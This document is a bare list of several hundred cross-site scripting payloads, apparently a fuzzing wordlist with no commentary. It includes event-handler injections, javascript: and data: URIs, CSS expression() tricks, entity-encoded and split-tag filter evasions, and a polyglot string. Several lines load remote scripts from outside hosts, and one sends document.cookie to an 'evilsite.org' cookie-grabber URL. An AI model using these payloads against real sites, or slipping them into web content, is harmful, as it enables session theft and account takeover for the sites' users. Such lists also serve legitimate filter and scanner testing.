<table onmouseover=console.log(1);//
<p onmouseover=console.log(document.cookie)><br><br><br><br>
<style onload=console.log(document.cookie)>
<xmp onmouseover=console.log(document.cookie)>
<xmp onmouseover=console.log(document.cookie)>FFFFFFFF</XMP>
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<script>alert(2)</script>
<form+id%3D"test"><%2Fform><button+form%3D"test"+formaction%3D"javascript%3Aalert%281%29">X<%2Fbutton>
<link rel="import" href="test.svg" />
<![><img src="]><img src=x onerror=console.log(1)//">
<style><img src="</style><img src=x onerror=console.log(1)//">
<li style=list-style:url() onerror=console.log(1)></li>
<STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>XSS</br>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=console.log(1)></div>
<head><base href="javascript://"/></head><body><a href="/. /,console.log(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>console.log(1)</SCRIPT>
<b <script>console.log(1)//</script>0</script></b>
<div id="div1"><input value="``onmouseover=console.log(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=console.log(1)//'>
<! '="foo"><x foo='><img src=x onerror=console.log(1)//'>
<? '="foo"><x foo='><img src=x onerror=console.log(1)//'>
<img src="javascript:console.log(1)">
<div style=width:1px;filter:glow onfilterchange=console.log(1)>x</div>
<object allowscriptaccess="always" data="test.swf"></object>
class XSS {public static function main() {flash.Lib.getURL(newflash.net.URLRequest(flash.Lib._root.url||"javascript:console.log(1)"),flash.Lib._root.name||"_top");}}
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
<img[a][b]src=x[d]onerror[c]=[e]"console.log(1)">
<a href="[a]java[b]script[c]:console.log(1)">XXX</a>
<img src="x` `<script>console.log(1)</script>"` `>
<img src onerror /" '"= alt=console.log(1)//">
<title onpropertychange=console.log(1)></title><title title=></title>
<script src="/\example.com\foo.js"></script>
<!-- `<img/src=xx:xx onerror=console.log(1)//--!>
<a style="-o-link:'javascript:console.log(1)';-o-link-source:current">X</a>
<style>p[foo=bar{}*{-o-link:'javascript:console.log(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="write(1);">XXX</a></a><a href="javascript:write(2)">XXX</a>
<style>*[{}@import\'test.css?]{color: green;}</style>X
* {-o-link:\'javascript:write(1)\';-o-link-source: current;}
<div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>
<// style=x:expression\28write(1)\29>
<div style=content:url(test2.svg)></div>
<div style="background:url(test5.svg)">PRESS ENTER</div>
<div style="background:url(http://foo.f/f oo/;color:redfoo.jpg);">X</div>
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
<div style="background:url(/f#[a]oo/;color:red//foo.jpg);">X</div>
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red//foo.jpg);">X</div>
<x style="background:url(\'x[a];color:red;/\')">XXX</x>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:write(1)"></g></svg>
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
<animation xlink:href="javascript:write(1)"/>
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
<x style="behavior:url(test.sct)">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=write(1)&gt;">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:write(\'XSS\');\">
<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;url=javascript:write(\'XSS\');\">
\'">><marquee><h1>XSS</h1></marquee>
\'">><script>write(\'XSS\')</script>
\'>><marquee><h1>XSS</h1></marquee>
<iframe<?php echo chr(11)?> onload=write(\'XSS\)></iframe>
window.write("Xyli !");
"""/></a></><img src=1.gif onerror=write(1)>"
[color=red\' onmouseover="write(\'XSS\')"]mouse over[/color]
<body onLoad="write(\'XSS\');"
<body onunload="javascript:write(\'XSS\');">
[url=javascript:write(\'XSS\');]click me[/url]
<script language="JavaScript">write(\'XSS\')</script>
<img src="javascript:write(\'XSS\')">
\'); write(\'XSS
<font style='color:expression(write(document.Cookie))'>
<IMG DYNSRC=\"javascript:write(\'XSS\')\">
<IMG LOWSRC=\"javascript:write(\'XSS\')\">
</textarea><script>write(/XSS/)</script>
</title><script>write(/XSS/)</script>
<script src=http://yoursite.com/your_files.js></script>
"""><script>write(0)</script>"
<marquee><script>write(\'XSS\')</script></marquee
<? echo(\'<scr)\';echo(\'ipt>write(\"XSS\")</script>\'); ?
<style>@im\port\'\ja\vasc\ript:write(\"XSS\")\';</style>
<img src=foo.png onerror=write(/XSSed/) />
<script>write(String.fromCharCode(88,83,83))</script>
<scr<script>ipt>write(\'XSS\');</scr</script>ipt>
<script>location.href="http://www.evilsite.org/Cookiegrabber.php?Cookie="+escape(document.Cookie)</script>
<script src="http://www.evilsite.org/Cookiegrabber.php"></script>
<script>write(\'XSS\');</script>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert(\'XSS\');//">
<BGSOUND SRC="javascript:alert(\'XSS\');">
<BODY BACKGROUND="javascript:alert(1);">
<DIV STYLE="background-image:url(javascript:alert(1))">
<DIV STYLE="width:expression(alert(2));">
<FRAMESET><FRAME SRC="javascript:alert(2);"></FRAMESET>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2);">
<IMG DYNSRC="javascript:write(1);">
<IMG LOWSRC="javascript:write(1);">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<STYLE>li {list-style-image:url("javascript:write(1)");}</STYLE><UL><LI>XSS
<IMG SRC=\'vbscript:msgbox("XSS")\'>
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
scriptalert(XSS)/script
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:write(1);">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:write(1);">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:write(1)></OBJECT
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<STYLE TYPE="text/javascript">write(1);</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(write(1))">
<XSS STYLE="xss:expression(write(1))">
<STYLE>.XSS{background-image:url("javascript:write(1)");}</STYLE><ACLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:write(1)")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:write(1);">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import\'http://ha.ckers.org/xss.css\';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:write(1);">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:write(1)"></B></I></XML>
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>write(1)</SCRIPT>"> </BODY></HTML>
<!--[if gte IE4]><SCRIPT>write(1);</SCRIPT><![endif]-->
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>write(1)</SCRIPT>">
<XSS STYLE="behavior:url(http://ha.ckers.org/xss.htc);">
<!--#exec cmd="/bin/echo \'<SCRIPT SRC\'"--><!--#execcmd="/bin/echo \'=http://ha.ckers.org/xss.js></SCRIPT>\'"-->
<?echo(\'<SCR)\';echo(\'IPT>alert("XSS")</SCRIPT>\'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-write(1);+ADw-/SCRIPT+AD4-\";write(1);//</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port\'\ja\vasc\ript:alert("XSS")\';</STYLE>
&<SCR\0IPT>alert("XSS")</SCR\0IPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/ alert(a.sour ?)</SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">\'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="javascript:document.location=\'http://www.google.com/\'">XSS</A>
<iframe "onload=alert(2)></iframe>
<iframe/ "onload=alert(2)></iframe>
<iframe<?php echo chr(11)?> onload=alert(2)></iframe>
<iframe<?php echo chr(12)?> onload=alert(2)></iframe>
<FRAMESET><FRAME SRC="javascript:alert(2)"></FRAMESET>
<XSS STYLE="xss:expression(alert(2))">
<STYLE TYPE="text/javascript">alert(2)</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(2)")}</STYLE>
<? echo(\'<SCR)\';echo(\'IPT>alert(2)</SCR\');echo(\'IPT>\'); ?>
<SCRIPT <B>=alert(2)"></SCRIPT>
<LAYER SRC="javascript:alert(2)></LAYER>
<DIV STYLE="binding: url(javascript:alert(2));">
<style><!--</style><SCRIPT>alert(2)//--></alert(2)>
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=write(1)&gt;">
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=# onerror=alert(1)>"> </BODY></HTML>
<STYLE>body {-moz-binding: url("javascript:alert(1)");}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>XSS</br>
<maction actiontype="statusline" xlink:href="jav&#x61;script:console.log(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:console.log(1)"></OBJECT>
<PARAM NAME="DataURL" VALUE="javascript:console.log(1)">
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
<IMG SRC="livescript:[code]">
<BR SIZE="&{write(1)}">
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<IMG SRC="mocha:[code]">
<marquee><script>write(\'XSS\')</script></marquee>
<video><source onerror="console.log(1)">
<video onerror="console.log(1)"><source></source></video>
<form><button formaction="jav\x61script:alert(1)">X</button>
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
<video poster=javascript:console.log(1)//></video>
<input onfocus=write(1) autofocus>
<body oninput=console.log(1)><input autofocus>
<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=console.log(1)//"></svg>
<table b\x61ckground="jav\\x61script:console.log(1)"></table>
<!--<img src="--><img src=x o\\x6eerror=console.log(1)//">
<!--<img src="--> o\\x6eload=console.log(1)//">
<comment><img src="</comment><img src=x o\\x6eerror=console.log(1)//">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<IMG SRC="jav&#x09;ascript:write(1);">
<IMG SRC="jav&#x0A;ascript:write(1);">
<IMG SRC="jav&#x0D;ascript:write(1);">
<IMG SRC=java\0script:alert("XSS")>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<DIV STYLE="background-image:\0075\0072\006C\0028\'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029\'\0029">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
exp/*<XSS STYLE=\'no\\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))\'>
<IMG SRC=" &#14;javascript:write(1);">
<DIV STYLE="background-image:url(&#1;javascript:alert(1))">
"""><script write(String.fromCharCode(88,83,83))</script>"
<div style="x:expression((window.r==1)?\'\':eval(\'r=1;write(String.fromCharCode(88,83,83));\'))">
<IMG SRC=javascript:write(String.fromCharCode(88,83,83))>
<IMG SRC=\"jav&#x0D;ascript:write(\'XSS\');\">
<IMG SRC=\"jav&#x0A;ascript:write(\'XSS\');\">
<IMG SRC=\"jav&#x09;ascript:write(\'XSS\');\">
;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
